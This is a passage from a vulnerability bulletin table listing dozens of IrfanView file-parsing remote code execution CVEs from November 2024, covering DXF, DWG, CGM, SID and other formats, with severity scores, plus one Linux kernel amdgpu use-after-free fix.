IrfanView RLE File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of RLE files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24445. | 2024-11-22 | 7.8 | CVE-2024-11519 |
| irfanview -- irfanview |
IrfanView ARW File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of ARW files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24488. | 2024-11-22 | 7.8 | CVE-2024-11520 |
| irfanview -- irfanview |
IrfanView DJVU File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DJVU files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24578. | 2024-11-22 | 7.8 | CVE-2024-11521 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24595. | 2024-11-22 | 7.8 | CVE-2024-11522 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24597. | 2024-11-22 | 7.8 | CVE-2024-11523 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24598. | 2024-11-22 | 7.8 | CVE-2024-11524 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24599. | 2024-11-22 | 7.8 | CVE-2024-11525 |
| irfanview -- irfanview |
IrfanView CGM File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24600. | 2024-11-22 | 7.8 | CVE-2024-11526 |
| irfanview -- irfanview |
IrfanView DWG File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24601. | 2024-11-22 | 7.8 | CVE-2024-11527 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24602. | 2024-11-22 | 7.8 | CVE-2024-11528 |
| irfanview -- irfanview |
IrfanView DWG File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24604. | 2024-11-22 | 7.8 | CVE-2024-11529 |
| irfanview -- irfanview |
IrfanView CGM File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24605. | 2024-11-22 | 7.8 | CVE-2024-11530 |
| irfanview -- irfanview |
IrfanView CGM File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24606. | 2024-11-22 | 7.8 | CVE-2024-11531 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24615. | 2024-11-22 | 7.8 | CVE-2024-11532 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24616. | 2024-11-22 | 7.8 | CVE-2024-11533 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24617. | 2024-11-22 | 7.8 | CVE-2024-11534 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24618. | 2024-11-22 | 7.8 | CVE-2024-11535 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24619. | 2024-11-22 | 7.8 | CVE-2024-11536 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24620. | 2024-11-22 | 7.8 | CVE-2024-11537 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24629. | 2024-11-22 | 7.8 | CVE-2024-11538 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24699. | 2024-11-22 | 7.8 | CVE-2024-11539 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24700. | 2024-11-22 | 7.8 | CVE-2024-11540 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24702. | 2024-11-22 | 7.8 | CVE-2024-11541 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24703. | 2024-11-22 | 7.8 | CVE-2024-11542 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24704. | 2024-11-22 | 7.8 | CVE-2024-11543 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24707. | 2024-11-22 | 7.8 | CVE-2024-11544 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24709. | 2024-11-22 | 7.8 | CVE-2024-11545 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24714. | 2024-11-22 | 7.8 | CVE-2024-11546 |
| irfanview -- irfanview |
IrfanView DWG File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24732. | 2024-11-22 | 7.8 | CVE-2024-11547 |
| irfanview -- irfanview |
IrfanView DWG File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24745. | 2024-11-22 | 7.8 | CVE-2024-11548 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24746. | 2024-11-22 | 7.8 | CVE-2024-11549 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24748. | 2024-11-22 | 7.8 | CVE-2024-11550 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24749. | 2024-11-22 | 7.8 | CVE-2024-11551 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24751. | 2024-11-22 | 7.8 | CVE-2024-11552 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24752. | 2024-11-22 | 7.8 | CVE-2024-11553 |
| irfanview -- irfanview |
IrfanView DWG File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24754. | 2024-11-22 | 7.8 | CVE-2024-11554 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24780. | 2024-11-22 | 7.8 | CVE-2024-11555 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24795. | 2024-11-22 | 7.8 | CVE-2024-11556 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24807. | 2024-11-22 | 7.8 | CVE-2024-11557 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24808. | 2024-11-22 | 7.8 | CVE-2024-11558 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24809. | 2024-11-22 | 7.8 | CVE-2024-11559 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24853. | 2024-11-22 | 7.8 | CVE-2024-11560 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24857. | 2024-11-22 | 7.8 | CVE-2024-11561 |
| irfanview -- irfanview |
IrfanView CGM File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24858. | 2024-11-22 | 7.8 | CVE-2024-11562 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24860. | 2024-11-22 | 7.8 | CVE-2024-11563 |
| irfanview -- irfanview |
IrfanView DWG File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DWG files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24864. | 2024-11-22 | 7.8 | CVE-2024-11564 |
| irfanview -- irfanview |
IrfanView CGM File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of CGM files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24866. | 2024-11-22 | 7.8 | CVE-2024-11565 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24868. | 2024-11-22 | 7.8 | CVE-2024-11566 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24871. | 2024-11-22 | 7.8 | CVE-2024-11567 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24872. | 2024-11-22 | 7.8 | CVE-2024-11568 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24873. | 2024-11-22 | 7.8 | CVE-2024-11569 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Use-After-Free Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24885. | 2024-11-22 | 7.8 | CVE-2024-11570 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Out-Of-Bounds Read Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24895. | 2024-11-22 | 7.8 | CVE-2024-11571 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24897. | 2024-11-22 | 7.8 | CVE-2024-11572 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24898. | 2024-11-22 | 7.8 | CVE-2024-11573 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24900. | 2024-11-22 | 7.8 | CVE-2024-11574 |
| irfanview -- irfanview |
IrfanView DXF File Parsing Memory Corruption Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of DXF files. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-24901. | 2024-11-22 | 7.8 | CVE-2024-11575 |
| irfanview -- irfanview |
IrfanView SID File Parsing Uninitialized Pointer Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SID files. The issue results from the lack of proper initialization of a pointer prior to accessing it. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23276. | 2024-11-22 | 7.8 | CVE-2024-9258 |
| irfanview -- irfanview |
IrfanView SID File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SID files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23278. | 2024-11-22 | 7.8 | CVE-2024-9259 |
| irfanview -- irfanview |
IrfanView SID File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SID files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23280. | 2024-11-22 | 7.8 | CVE-2024-9260 |
| irfanview -- irfanview |
IrfanView SID File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of IrfanView. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of SID files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-23283. | 2024-11-22 | 7.8 | CVE-2024-9261 |
| linux -- linux_kernel |
In the Linux kernel, the following vulnerability has been resolved: drm/amdgpu: fix possible UAF in amdgpu_cs_pass1() Since the gang_size check is outside of chunk parsing loop, we need to reset i before we free the chunk data. Suggested by Ye Zhang (@VAR10CK) of Baidu Security. | 2024-11-19 | 7.8 | CVE-2023-52921 |
| linux -- linux_kernel |
